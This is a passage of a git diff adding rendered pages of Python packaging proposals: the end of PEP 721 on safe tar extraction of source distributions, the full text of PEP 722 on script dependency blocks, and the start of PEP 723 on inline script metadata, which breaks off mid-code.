When extracting a source distribution, tools MUST either use +tarfile.data_filter (e.g. TarFile.extractall(..., filter='data')), OR +follow the Unpacking without the data filter section below.

+

As an exception, on Python interpreters without hasattr(tarfile, 'data_filter') +(PEP 706), tools that normally use that filter (directly on indirectly) +MAY warn the user and ignore this specification. +The trade-off between usability (e.g. fully trusting the archive) and +security (e.g. refusing to unpack) is left up to the tool in this case.

+
+
+

Unpacking without the data filter

+

Tools that do not use the data filter directly (e.g. for backwards +compatibility, allowing additional features, or not using Python) MUST follow +this section. +(At the time of this writing, the data filter also follows this section, +but it may get out of sync in the future.)

+

The following files are invalid in an sdist archive. +Upon encountering such an entry, tools SHOULD notify the user, +MUST NOT unpack the entry, and MAY abort with a failure:

+
    +
  • Files that would be placed outside the destination directory.
  • +
  • Links (symbolic or hard) pointing outside the destination directory.
  • +
  • Device files (including pipes).
  • +
+

The following are also invalid. Tools MAY treat them as above, +but are NOT REQUIRED to do so:

+
    +
  • Files with a .. component in the filename or link target.
  • +
  • Links pointing to a file that is not part of the archive.
  • +
+

Tools MAY unpack links (symbolic or hard) as regular files, +using content from the archive.

+

When extracting sdist archives:

+
    +
  • Leading slashes in file names MUST be dropped. +(This is nowadays standard behaviour for tar unpacking.)
  • +
  • For each mode (Unix permission) bit, tools MUST either:
      +
    • use the platform’s default for a new file/directory (respectively),
    • +
    • set the bit according to the archive, or
    • +
    • use the bit from rw-r--r-- (0o644) for non-executable files or +rwxr-xr-x (0o755) for executable files and directories.
    • +
    +
  • +
  • High mode bits (setuid, setgid, sticky) MUST be cleared.
  • +
  • It is RECOMMENDED to preserve the user executable bit.
  • +
+
+
+

Further hints

+

Tool authors are encouraged to consider how hints for further +verification in tarfile documentation apply for their tool.

+
+
+
+

Backwards Compatibility

+

The existing behaviour is unspecified, and treated differently by different +tools. +This PEP makes the expectations explicit.

+

There is no known case of backwards incompatibility, but some project out there +probably does rely on details that aren’t guaranteed. +This PEP bans the most dangerous of those features, and the rest is +made tool-specific.

+
+
+

Security Implications

+

The recommended data filter is believed safe against common exploits, +and is a single place to amend if flaws are found in the future.

+

The explicit specification includes protections from the data filter.

+
+
+

How to Teach This

+

The PEP is aimed at authors of packaging tools, who should be fine with +a PEP and an updated packaging spec.

+
+
+

Reference Implementation

+

TBD

+
+
+

Rejected Ideas

+

None yet.

+
+
+

Open Issues

+

None yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0721.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0722/index.html b/pep-0722/index.html new file mode 100644 index 00000000000..5b8e7ada22b --- /dev/null +++ b/pep-0722/index.html @@ -0,0 +1,780 @@ + + + + + + + + PEP 722 – Dependency specification for single-file scripts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 722 – Dependency specification for single-file scripts

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
19-Jul-2023
+
Post-History:
+
19-Jul-2023
+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a format for including 3rd-party dependencies in a +single-file Python script.

+
+
+

Motivation

+

Not all Python code is structured as a “project”, in the sense of having its own +directory complete with a pyproject.toml file, and being built into an +installable distribution package. Python is also routinely used as a scripting +language, with Python scripts as a (better) alternative to shell scripts, batch +files, etc. When used to create scripts, Python code is typically stored as a +single file, often in a directory dedicated to such “utility scripts”, which +might be in a mix of languages with Python being only one possibility among +many. Such scripts may be shared, often by something as simple as email, or a +link to a URL such as a Github gist. But they are typically not “distributed” +or “installed” as part of a normal workflow.

+

One problem when using Python as a scripting language in this way is how to run +the script in an environment that contains whatever third party dependencies are +required by the script. There is currently no standard tool that addresses this +issue, and this PEP does not attempt to define one. However, any tool that +does address this issue will need to know what 3rd party dependencies a script +requires. By defining a standard format for storing such data, existing tools, +as well as any future tools, will be able to obtain that information without +requiring users to include tool-specific metadata in their scripts.

+
+
+

Rationale

+

Because a key requirement is writing single-file scripts, and simple sharing by +giving someone a copy of the script, the PEP defines a mechanism for embedding +dependency data within the script itself, and not in an external file.

+

We define the concept of a dependency block that contains information about +what 3rd party packages a script depends on.

+

In order to identify dependency blocks, the script can simply be read as a text +file. This is deliberate, as Python syntax changes over time, so attempting to +parse the script as Python code would require choosing a specific version of +Python syntax. Also, it is likely that at least some tools will not be written +in Python, and expecting them to implement a Python parser is too much of a +burden.

+

However, to avoid needing changes to core Python, the format is designed to +appear as comments to the Python parser. It is possible to write code where a +dependency block is not interpreted as a comment (for example, by embedding it +in a Python multi-line string), but such uses are discouraged and can easily be +avoided assuming you are not deliberately trying to create a pathological +example.

+

A review of how other languages allow scripts to specify +their dependencies shows that a “structured comment” like this is a +commonly-used approach.

+
+
+

Specification

+

The content of this section will be published in the Python Packaging user +guide, PyPA Specifications section, as a document with the title “Embedding +Metadata in Script Files”.

+

Any Python script may contain a dependency block. The dependency block is +identified by reading the script as a text file (i.e., the file is not parsed +as Python source code), looking for the first line of the form:

+
# Script Dependencies:
+
+
+

The hash character must be at the start of the line with no preceding whitespace. +The text “Script Dependencies” is recognised regardless of case, and the spaces +represent arbitrary whitespace (although at least one space must be present). The +following regular expression recognises the dependency block header line:

+
(?i)^#\s+script\s+dependencies:\s*$
+
+
+

Tools reading the dependency block MAY respect the standard Python encoding +declaration. If they choose not to do so, they MUST process the file as UTF-8.

+

After the header line, all lines in the file up to the first line that doesn’t +start with a # sign are considered dependency lines and are treated as +follows:

+
    +
  1. The initial # sign is stripped.
  2. +
  3. If the line contains the character sequence “ # “ (SPACE HASH SPACE), then +those characters and any subsequent characters are discarded. This allows +dependency blocks to contain inline comments.
  4. +
  5. Whitespace at the start and end of the remaining text is discarded.
  6. +
  7. If the line is now empty, it is ignored.
  8. +
  9. The content of the line MUST now be a valid PEP 508 dependency specifier.
  10. +
+

The requirement for spaces before and after the # in an inline comment is +necessary to distinguish them from part of a PEP 508 URL specifier (which +can contain a hash, but without surrounding whitespace).

+

Consumers MUST validate that at a minimum, all dependencies start with a +name as defined in PEP 508, and they MAY validate that all dependencies +conform fully to PEP 508. They MUST fail with an error if they find an +invalid specifier.

+
+

Example

+

The following is an example of a script with an embedded dependency block:

+
# In order to run, this script needs the following 3rd party libraries
+#
+# Script Dependencies:
+#    requests
+#    rich     # Needed for the output
+#
+#    # Not needed - just to show that fragments in URLs do not
+#    # get treated as comments
+#    pip @ https://github.com/pypa/pip/archive/1.3.1.zip#sha1=da9234ee9982d4bbb3c72346a6de940a148ea686
+
+import requests
+from rich.pretty import pprint
+
+resp = requests.get("https://peps.python.org/api/peps.json")
+data = resp.json()
+pprint([(k, v["title"]) for k, v in data.items()][:10])
+
+
+
+
+
+

Backwards Compatibility

+

As dependency blocks take the form of a structured comment, they can be added +without altering the meaning of existing code.

+

It is possible that a comment may already exist which matches the form of a +dependency block. While the identifying header text, “Script Dependencies” is +chosen to minimise this risk, it is still possible.

+

In the rare case where an existing comment would be interpreted incorrectly as a +dependency block, this can be addressed by adding an actual dependency block +(which can be empty if the script has no dependencies) earlier in the code.

+
+
+

Security Implications

+

If a script containing a dependency block is run using a tool that automatically +installs dependencies, this could cause arbitrary code to be downloaded and +installed in the user’s environment.

+

The risk here is part of the functionality of the tool being used to run the +script, and as such should already be addressed by the tool itself. The only +additional risk introduced by this PEP is if an untrusted script with a +dependency block is run, when a potentially malicious dependency might be +installed. This risk is addressed by the normal good practice of reviewing code +before running it.

+
+
+

How to Teach This

+

The format is intended to be close to how a developer might already specify +script dependencies in an explanatory comment. The required structure is +deliberately minimal, so that formatting rules are easy to learn.

+

Users will need to know how to write Python dependency specifiers. This is +covered by PEP 508, but for simple examples (which is expected to be the norm +for inexperienced users) the syntax is either just a package name, or a name and +a version restriction, which is fairly well-understood syntax.

+

Users will also know how to run a script using a tool that interprets +dependency data. This is not covered by this PEP, as it is the responsibility of +such a tool to document how it should be used.

+

Note that the core Python interpreter does not interpret dependency blocks. +This may be a point of confusion for beginners, who try to run python +some_script.py and do not understand why it fails. This is no different than +the current status quo, though, where running a script without its dependencies +present will give an error.

+

In general, it is assumed that if a beginner is given a script with dependencies +(regardless of whether they are specified in a dependency block), the person +supplying the script should explain how to run that script, and if that involves +using a script runner tool, that should be noted.

+
+
+

Recommendations

+

This section is non-normative and simply describes “good practices” when using +dependency blocks.

+

While it is permitted for tools to do minimal validation of requirements, in +practice they should do as much “sanity check” validation as possible, even if +they cannot do a full check for PEP 508 syntax. This helps to ensure that +dependency blocks that are not correctly terminated are reported early. A good +compromise between the minimal approach of checking just that the requirement +starts with a name, and full PEP 508 validation, is to check for a bare name, +or a name followed by optional whitespace, and then one of [ (extra), @ +(urlspec), ; (marker) or one of (<!=>~ (version).

+

Scripts should, in general, place the dependency block at the top of the file, +either immediately after any shebang line, or straight after the script +docstring. In particular, the dependency block should always be placed before +any executable code in the file. This makes it easy for the human reader to +locate it.

+
+
+

Reference Implementation

+

Code to implement this proposal in Python is fairly straightforward, so the +reference implementation can be included here.

+
import re
+import tokenize
+from packaging.requirements import Requirement
+
+DEPENDENCY_BLOCK_MARKER = r"(?i)^#\s+script\s+dependencies:\s*$"
+
+def read_dependency_block(filename):
+    # Use the tokenize module to handle any encoding declaration.
+    with tokenize.open(filename) as f:
+        # Skip lines until we reach a dependency block (OR EOF).
+        for line in f:
+            if re.match(DEPENDENCY_BLOCK_MARKER, line):
+                break
+        # Read dependency lines until we hit a line that doesn't
+        # start with #, or we are at EOF.
+        for line in f:
+            if not line.startswith("#"):
+                break
+            # Remove comments. An inline comment is introduced by
+            # a hash, which must be preceded and followed by a
+            # space.
+            line = line[1:].split(" # ", maxsplit=1)[0]
+            line = line.strip()
+            # Ignore empty lines
+            if not line:
+                continue
+            # Try to convert to a requirement. This will raise
+            # an error if the line is not a PEP 508 requirement
+            yield Requirement(line)
+
+
+

A format similar to the one proposed here is already supported in pipx and in pip-run.

+
+
+

Rejected Ideas

+
+

Why not include other metadata?

+

The core use case addressed by this proposal is that of identifying what +dependencies a standalone script needs in order to run successfully. This is a +common real-world issue that is currently solved by script runner tools, using +implementation-specific ways of storing the data. Standardising the storage +format improves interoperability by not typing the script to a particular +runner.

+

While it is arguable that other forms of metadata could be useful in a +standalone script, the need is largely theoretical at this point. In practical +terms, scripts either don’t use other metadata, or they store it in existing, +widely used (and therefore de facto standard) formats. For example, scripts +needing README style text typically use the standard Python module docstring, +and scripts wanting to declare a version use the common convention of having a +__version__ variable.

+

One case which was raised during the discussion on this PEP, was the ability to +declare a minimum Python version that a script needed to run, by analogy with +the Requires-Python core metadata item for packages. Unlike packages, +scripts are normally only run by one user or in one environment, in contexts +where multiple versions of Python are uncommon. The need for this metadata is +therefore much less critical in the case of scripts. As further evidence of +this, the two key script runners currently available, pipx and pip-run +do not offer a means of including this data in a script.

+

Creating a standard “metadata container” format would unify the various +approaches, but in practical terms there is no real need for unification, and +the disruption would either delay adoption, or more likely simply mean script +authors would ignore the standard.

+

This proposal therefore chooses to focus just on the one use case where there is +a clear need for something, and no existing standard or common practice.

+
+
+

Why not use a marker per line?

+

Rather than using a comment block with a header, another possibility would be to +use a marker on each line, something like:

+
# Script-Dependency: requests
+# Script-Dependency: click
+
+
+

While this makes it easier to parse lines individually, it has a number of +issues. The first is simply that it’s rather verbose, and less readable. This is +clearly affected by the chosen keyword, but all of the suggested options were +(in the author’s opinion) less readable than the block comment form.

+

More importantly, this form by design makes it impossible to require that the +dependency specifiers are all together in a single block. As a result, it’s not +possible for a human reader, without a careful check of the whole file, to be +sure that they have identified all of the dependencies. See the question below, +“Why not allow multiple dependency blocks and merge them?”, for further +discussion of this problem.

+

Finally, as the reference implementation demonstrates, parsing the “comment +block” form isn’t, in practice, significantly more difficult than parsing this +form.

+
+
+

Why not use a distinct form of comment for the dependency block?

+

A previous version of this proposal used ## to identify dependency blocks. +Unfortunately, however, the flake8 linter implements a rule requiring that +comments must have a space after the initial # sign. While the PEP author +considers that rule misguided, it is on by default and as a result would cause +checks to fail when faced with a dependency block.

+

Furthermore, the black formatter, although it allows the ## form, does +add a space after the # for most other forms of comment. This means that if +we chose an alternative like #%, automatic reformatting would corrupt the +dependency block. Forms including a space, like # # are possible, but less +natural for the average user (omitting the space is an obvious mistake to make).

+

While it is possible that linters and formatters could be changed to recognise +the new standard, the benefit of having a dedicated prefix did not seem +sufficient to justify the transition cost, or the risk that users might be using +older tools.

+
+
+

Why not allow multiple dependency blocks and merge them?

+

Because it’s too easy for the human reader to miss the fact that there’s a +second dependency block. This could simply result in the script runner +unexpectedly downloading extra packages, or it could even be a way to smuggle +malicious packages onto a user’s machine (by “hiding” a second dependency block +in the body of the script).

+

While the principle of “don’t run untrusted code” applies here, the benefits +aren’t sufficient to be worth the risk.

+
+
+

Why not use a more standard data format (e.g., TOML)?

+

First of all, the only practical choice for an alternative format is TOML. +Python packaging has standardised on TOML for structured data, and using a +different format, such as YAML or JSON, would add complexity and confusion for +no real benefit.

+

So the question is essentially, “why not use TOML?”

+

The key idea behind the “dependency block” format is to define something that +reads naturally as a comment in the script. Dependency data is useful both for +tools and for the human reader, so having a human readable format is beneficial. +On the other hand, TOML of necessity has a syntax of its own, which distracts +from the underlying data.

+

It is important to remember that developers who write scripts in Python are +often not experienced in Python, or Python packaging. They are often systems +administrators, or data analysts, who may simply be using Python as a “better +batch file”. For such users, the TOML format is extremely likely to be +unfamiliar, and the syntax will be obscure to them, and not particularly +intuitive. Such developers may well be copying dependency specifiers from +sources such as Stack Overflow, without really understanding them. Having to +embed such a requirement into a TOML structure is an additional complexity – +and it is important to remember that the goal here is to make using 3rd party +libraries easy for such users.

+

Furthermore, TOML, by its nature, is a flexible format intended to support very +general data structures. There are many ways of writing a simple list of +strings in it, and it will not be clear to inexperienced users which form to use.

+

Another potential issue is that using a generalised TOML parser can in some cases +result in a measurable performance overhead. Startup time is often quoted as an +issue when running small scripts, so this may be a problem for script runners that +are aiming for high performance.

+

And finally, there will be tools that expect to write dependency data into +scripts – for example, an IDE with a feature that automatically adds an import +and a dependency specifier when you reference a library function. While +libraries exist that allow editing TOML data, they are not always good at +preserving the user’s layout. Even if libraries exist which do an effective job +at this, expecting all tools to use such a library is a significant imposition +on code supporting this PEP.

+

By choosing a simple, line-based format with no quoting rules, dependency data +is easy to read (for humans and tools) and easy to write. The format doesn’t +have the flexibility of something like TOML, but the use case simply doesn’t +demand that sort of flexibility.

+
+
+

Why not use (possibly restricted) Python syntax?

+

This would typically involve storing the dependencies as a (runtime) list +variable with a conventional name, such as:

+
__requires__ = [
+    "requests",
+    "click",
+]
+
+
+

Other suggestions include a static multi-line string, or including the +dependencies in the script’s docstring.

+

The most significant problem with this proposal is that it requires all +consumers of the dependency data to implement a Python parser. Even if the +syntax is restricted, the rest of the script will use the full Python syntax, +and trying to define a syntax which can be successfully parsed in isolation from +the surrounding code is likely to be extremely difficult and error-prone.

+

Furthermore, Python’s syntax changes in every release. If extracting dependency +data needs a Python parser, the parser will need to know which version of Python +the script is written for, and the overhead for a generic tool of having a +parser that can handle multiple versions of Python is unsustainable.

+

Even if the above issues could be addressed, the format would give the +impression that the data could be altered at runtime. However, this is not the +case in general, and code that tries to do so will encounter unexpected and +confusing behaviour.

+

And finally, there is no evidence that having dependency data available at +runtime is of any practical use. Should such a use be found, it is simple enough +to get the data by parsing the source - read_dependency_block(__file__).

+

It is worth noting, though, that the pip-run utility does implement (an +extended form of) this approach. Further discussion of +the pip-run design is available on the project’s issue tracker.

+
+
+

Why not embed a pyproject.toml file in the script?

+

First of all, pyproject.toml is a TOML based format, so all of the previous +concerns around TOML as a format apply. However, pyproject.toml is a +standard used by Python packaging, and re-using an existing standard is a +reasonable suggestion that deserves to be addressed on its own merits.

+

The first issue is that the suggestion rarely implies that all of +pyproject.toml is to be supported for scripts. A script is not intended to +be “built” into any sort of distributable artifact like a wheel (see below for +more on this point), so the [build-system] section of pyproject.toml +makes little sense, for example. And while the tool-specific sections of +pyproject.toml might be useful for scripts, it’s not at all clear that a +tool like ruff would want to support per-file +configuration in this way, leading to confusion when users expect it to work, +but it doesn’t. Furthermore, this sort of tool-specific configuration is just as +useful for individual files in a larger project, so we have to consider what it +would mean to embed a pyproject.toml into a single file in a larger project +that has its own pyproject.toml.

+

In addition, pyproject.toml is currently focused on projects that are to be +built into wheels. There is an ongoing discussion +about how to use pyproject.toml for projects that are not intended to be +built as wheels, and until that question is resolved (which will likely require +some PEPs of its own) it seems premature to be discussing embedding +pyproject.toml into scripts, which are definitely not intended to be built +and distributed in that manner.

+

The conclusion, therefore (which has been stated explicitly in some, but not +all, cases) is that this proposal is intended to mean that we would embed part +of pyproject.toml. Typically this is the [project] section from +PEP 621, or even just the dependencies item from that section.

+

At this point, the first issue is that by framing the proposal as “embedding +pyproject.toml”, we would be encouraging the sort of confusion discussed in +the previous paragraphs - developers will expect the full capabilities of +pyproject.toml, and be confused when there are differences and limitations. +It would be better, therefore, to consider this suggestion as simply being a +proposal to use an embedded TOML format, but specifically re-using the +structure of a particular part of pyproject.toml. The problem then becomes +how we describe that structure, without causing confusion for people familiar +with pyproject.toml. If we describe it with reference to pyproject.toml, +the link is still there. But if we describe it in isolation, people will be +confused by the “similar but different” nature of the structure.

+

It is also important to remember that a key part of the target audience for this +proposal is developers who are simply using Python as a “better batch file” +solution. These developers will generally not be familiar with Python packaging +and its conventions, and are often the people most critical of the “complexity” +and “difficulty” of packaging solutions. As a result, proposals based on those +existing solutions are likely to be unwelcome to that audience, and could easily +result in people simply continuing to use existing adhoc solutions, and ignoring +the standard that was intended to make their lives easier.

+
+
+

Why not infer the requirements from import statements?

+

The idea would be to automatically recognize import statements in the source +file and turn them into a list of requirements.

+

However, this is infeasible for several reasons. First, the points above about +the necessity to keep the syntax easily parsable, for all Python versions, also +by tools written in other languages, apply equally here.

+

Second, PyPI and other package repositories conforming to the Simple Repository +API do not provide a mechanism to resolve package names from the module names +that are imported (see also this related discussion).

+

Third, even if repositories did offer this information, the same import name may +correspond to several packages on PyPI. One might object that disambiguating +which package is wanted would only be needed if there are several projects +providing the same import name. However, this would make it easy for anyone to +unintentionally or malevolently break working scripts, by uploading a package to +PyPI providing an import name that is the same as an existing project. The +alternative where, among the candidates, the first package to have been +registered on the index is chosen, would be confusing in case a popular package +is developed with the same import name as an existing obscure package, and even +harmful if the existing package is malware intentionally uploaded with a +sufficiently generic import name that has a high probability of being reused.

+

A related idea would be to attach the requirements as comments to the import +statements instead of gathering them in a block, with a syntax such as:

+
import numpy as np # requires: numpy
+import rich # requires: rich
+
+
+

This still suffers from parsing difficulties. Also, where to place the comment +in the case of multiline imports is ambiguous and may look ugly:

+
from PyQt5.QtWidgets import (
+    QCheckBox, QComboBox, QDialog, QDialogButtonBox,
+    QGridLayout, QLabel, QSpinBox, QTextEdit
+) # requires: PyQt5
+
+
+

Furthermore, this syntax cannot behave as might be intuitively expected +in all situations. Consider:

+
import platform
+if platform.system() == "Windows":
+    import pywin32 # requires: pywin32
+
+
+

Here, the user’s intent is that the package is only required on Windows, but +this cannot be understood by the script runner (the correct way to write +it would be requires: pywin32 ; sys_platform == 'win32').

+

(Thanks to Jean Abou-Samra for the clear discussion of this point)

+
+
+

Why not simply manage the environment at runtime?

+

Another approach to running scripts with dependencies is simply to manage those +dependencies at runtime. This can be done by using a library that makes packages +available. There are many options for implementing such a library, for example +by installing them directly into the user’s environment or by manipulating +sys.path to make them available from a local cache.

+

These approaches are not incompatible with this PEP. An API such as

+
env_mgr.install("rich")
+env_mgr.install("click")
+
+import rich
+import click
+
+...
+
+
+

is certainly feasible. However, such a library could be written without the need +for any new standards, and as far as the PEP author is aware, this has not +happened. This suggests that an approach like this is not as attractive as it +first seems. There is also the bootstrapping issue of making the env_mgr +library available in the first place. And finally, this approach doesn’t +actually offer any interoperability benefits, as it does not use a standard form +for the dependency list, and so other tools cannot access the data.

+

In any case, such a library could still benefit from this proposal, as it could +include an API to read the packages to install from the script dependency block. +This would give the same functionality while allowing interoperability with +other tools that support this specification.

+
# Script Dependencies:
+#     rich
+#     click
+env_mgr.install_dependencies(__file__)
+
+import rich
+import click
+
+...
+
+
+
+
+

Why not just set up a Python project with a pyproject.toml?

+

Again, a key issue here is that the target audience for this proposal is people +writing scripts which aren’t intended for distribution. Sometimes scripts will +be “shared”, but this is far more informal than “distribution” - it typically +involves sending a script via an email with some written instructions on how to +run it, or passing someone a link to a gist.

+

Expecting such users to learn the complexities of Python packaging is a +significant step up in complexity, and would almost certainly give the +impression that “Python is too hard for scripts”.

+

In addition, if the expectation here is that the pyproject.toml will somehow +be designed for running scripts in place, that’s a new feature of the standard +that doesn’t currently exist. At a minimum, this isn’t a reasonable suggestion +until the current discussion on Discourse about +using pyproject.toml for projects that won’t be distributed as wheels is +resolved. And even then, it doesn’t address the “sending someone a script in a +gist or email” use case.

+
+
+

Why not use a requirements file for dependencies?

+

Putting your requirements in a requirements file, doesn’t require a PEP. You can +do that right now, and in fact it’s quite likely that many adhoc solutions do +this. However, without a standard, there’s no way of knowing how to locate a +script’s dependency data. And furthermore, the requirements file format is +pip-specific, so tools relying on it are depending on a pip implementation +detail.

+

So in order to make a standard, two things would be required:

+
    +
  1. A standardised replacement for the requirements file format.
  2. +
  3. A standard for how to locate the requirements file for a given script.
  4. +
+

The first item is a significant undertaking. It has been discussed on a number +of occasions, but so far no-one has attempted to actually do it. The most likely +approach would be for standards to be developed for individual use cases +currently addressed with requirements files. One option here would be for this +PEP to simply define a new file format which is simply a text file containing +PEP 508 requirements, one per line. That would just leave the question of how +to locate that file.

+

The “obvious” solution here would be to do something like name the file the same +as the script, but with a .reqs extension (or something similar). However, +this still requires two files, where currently only a single file is needed, +and as such, does not match the “better batch file” model (shell scripts and +batch files are typically self-contained). It requires the developer to remember +to keep the two files together, and this may not always be possible. For +example, system administration policies may require that all files in a +certain directory are executable (the Linux filesystem standards require this of +/usr/bin, for example). And some methods of sharing a script (for example, +publishing it on a text file sharing service like Github’s gist, or a corporate +intranet) may not allow for deriving the location of an associated requirements +file from the script’s location (tools like pipx support running a script +directly from a URL, so “download and unpack a zip of the script and its +dependencies” may not be an appropriate requirement).

+

Essentially, though, the issue here is that there is an explicitly stated +requirement that the format supports storing dependency data in the script file +itself. Solutions that don’t do that are simply ignoring that requirement.

+
+
+

Should scripts be able to specify a package index?

+

Dependency metadata is about what package the code depends on, and not where +that package comes from. There is no difference here between metadata for +scripts, and metadata for distribution packages (as defined in +pyproject.toml). In both cases, dependencies are given in “abstract” form, +without specifying how they are obtained.

+

Some tools that use the dependency information may, of course, need to locate +concrete dependency artifacts - for example if they expect to create an +environment containing those dependencies. But the way they choose to do that +will be closely linked to the tool’s UI in general, and this PEP does not try to +dictate the UI for tools.

+

There is more discussion of this point, and in particular of the UI choices made +by the pip-run tool, in the previously mentioned pip-run issue.

+
+
+

What about local dependencies?

+

These can be handled without needing special metadata and tooling, simply by +adding the location of the dependencies to sys.path. This PEP simply isn’t +needed for this case. If, on the other hand, the “local dependencies” are actual +distributions which are published locally, they can be specified as usual with a +PEP 508 requirement, and the local package index specified when running a +tool by using the tool’s UI for that.

+
+
+
+

Open Issues

+

None at this point.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0722.rst

+

Last modified: 2023-10-21 10:30:17 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0723/index.html b/pep-0723/index.html new file mode 100644 index 00000000000..c55215e1cea --- /dev/null +++ b/pep-0723/index.html @@ -0,0 +1,863 @@ + + + + + + + + PEP 723 – Inline script metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 723 – Inline script metadata

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Adam Turner <python at quite.org.uk>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-Aug-2023
+
Post-History:
+
04-Aug-2023, +06-Aug-2023, +23-Aug-2023, +06-Dec-2023
+
Replaces:
+
722
+
Resolution:
+
08-Jan-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Inline script metadata, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies a metadata format that can be embedded in single-file Python +scripts to assist launchers, IDEs and other external tools which may need to +interact with such scripts.

+
+
+

Motivation

+

Python is routinely used as a scripting language, with Python scripts as a +(better) alternative to shell scripts, batch files, etc. When Python code is +structured as a script, it is usually stored as a single file and does not +expect the availability of any other local code that may be used for imports. +As such, it is possible to share with others over arbitrary text-based means +such as email, a URL to the script, or even a chat window. Code that is +structured like this may live as a single file forever, never becoming a +full-fledged project with its own directory and pyproject.toml file.

+

An issue that users encounter with this approach is that there is no standard +mechanism to define metadata for tools whose job it is to execute such scripts. +For example, a tool that runs a script may need to know which dependencies are +required or the supported version(s) of Python.

+

There is currently no standard tool that addresses this issue, and this PEP +does not attempt to define one. However, any tool that does address this +issue will need to know what the runtime requirements of scripts are. By +defining a standard format for storing such metadata, existing tools, as well +as any future tools, will be able to obtain that information without requiring +users to include tool-specific metadata in their scripts.

+
+
+

Rationale

+

This PEP defines a mechanism for embedding metadata within the script itself, +and not in an external file.

+

The metadata format is designed to be similar to the layout of data in the +pyproject.toml file of a Python project directory, to provide a familiar +experience for users who have experience writing Python projects. By using a +similar format, we avoid unnecessary inconsistency between packaging tools, +a common frustration expressed by users in the recent +packaging survey.

+

The following are some of the use cases that this PEP wishes to support:

+
    +
  • A user facing CLI that is capable of executing scripts. If we take Hatch as +an example, the interface would be simply +hatch run /path/to/script.py [args] and Hatch will manage the +environment for that script. Such tools could be used as shebang lines on +non-Windows systems e.g. #!/usr/bin/env hatch run.
  • +
  • A script that desires to transition to a directory-type project. A user may +be rapidly prototyping locally or in a remote REPL environment and then +decide to transition to a more formal project layout if their idea works +out. Being able to define dependencies in the script would be very useful to +have fully reproducible bug reports.
  • +
  • Users that wish to avoid manual dependency management. For example, package +managers that have commands to add/remove dependencies or dependency update +automation in CI that triggers based on new versions or in response to +CVEs [1].
  • +
+
+
+

Specification

+

This PEP defines a metadata comment block format loosely inspired [2] by +reStructuredText Directives.

+

Any Python script may have top-level comment blocks that MUST start with the +line # /// TYPE where TYPE determines how to process the content. That +is: a single #, followed by a single space, followed by three forward +slashes, followed by a single space, followed by the type of metadata. Block +MUST end with the line # ///. That is: a single #, followed by a single +space, followed by three forward slashes. The TYPE MUST only consist of +ASCII letters, numbers and hyphens.

+

Every line between these two lines (# /// TYPE and # ///) MUST be a +comment starting with #. If there are characters after the # then the +first character MUST be a space. The embedded content is formed by taking away +the first two characters of each line if the second character is a space, +otherwise just the first character (which means the line consists of only a +single #).

+

Precedence for an ending line # /// is given when the next line is not +a valid embedded content line as described above. For example, the following +is a single fully valid block:

+
# /// some-toml
+# embedded-csharp = """
+# /// <summary>
+# /// text
+# ///
+# /// </summary>
+# public class MyClass { }
+# """
+# ///
+
+
+

A starting line MUST NOT be placed between another starting line and its ending +line. In such cases tools MAY produce an error. Unclosed blocks MUST be ignored.

+

When there are multiple comment blocks of the same TYPE defined, tools MUST +produce an error.

+

Tools reading embedded metadata MAY respect the standard Python encoding +declaration. If they choose not to do so, they MUST process the file as UTF-8.

+

This is the canonical regular expression that MAY be used to parse the +metadata:

+
(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$
+
+
+

In circumstances where there is a discrepancy between the text specification +and the regular expression, the text specification takes precedence.

+

Tools MUST NOT read from metadata blocks with types that have not been +standardized by this PEP or future ones.

+
+

script type

+

The first type of metadata block is named script which contains script +metadata (dependency data and tool configuration).

+

This document MAY include top-level fields dependencies and requires-python, +and MAY optionally include a [tool] table.

+

The [tool] table MAY be used by any tool, script runner or otherwise, to configure +behavior. It has the same semantics as the tool table in +pyproject.toml.

+

The top-level fields are:

+
    +
  • dependencies: A list of strings that specifies the runtime dependencies +of the script. Each entry MUST be a valid PEP 508 dependency.
  • +
  • requires-python: A string that specifies the Python version(s) with which +the script is compatible. The value of this field MUST be a valid +version specifier.
  • +
+

Script runners MUST error if the specified dependencies cannot be provided. +Script runners SHOULD error if no version of Python that satisfies the specified +requires-python can be provided.

+
+
+

Example

+

The following is an example of a script with embedded metadata:

+
# /// script
+# requires-python = ">=3.11"
+# dependencies = [
+#   "requests<3",
+#   "rich",
+# ]
+# ///
+
+import requests
+from rich.pretty import pprint
+
+resp = requests.get("https://peps.python.org/api/peps.json")
+data = resp.json()
+pprint([(k, v["title"]) for k, v in data.items()][:10])
+
+
+
+
+
+

Reference Implementation

+

The following is an example of how to read the metadata on Python 3.11 or +higher.

+
import re
+import tomllib
+
+REGEX = r'(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$'
+
+def read(script: str) -> dict | None:
+    name = 'script'
+    matches = list(
+        filter(lambda m: m.group('type') == name, re.finditer(REGEX, script))
+    )
+    if len(matches) > 1:
+        raise ValueError(f'Multiple {name} blocks found')
+    elif len(matches) == 1:
+        content = ''.join(
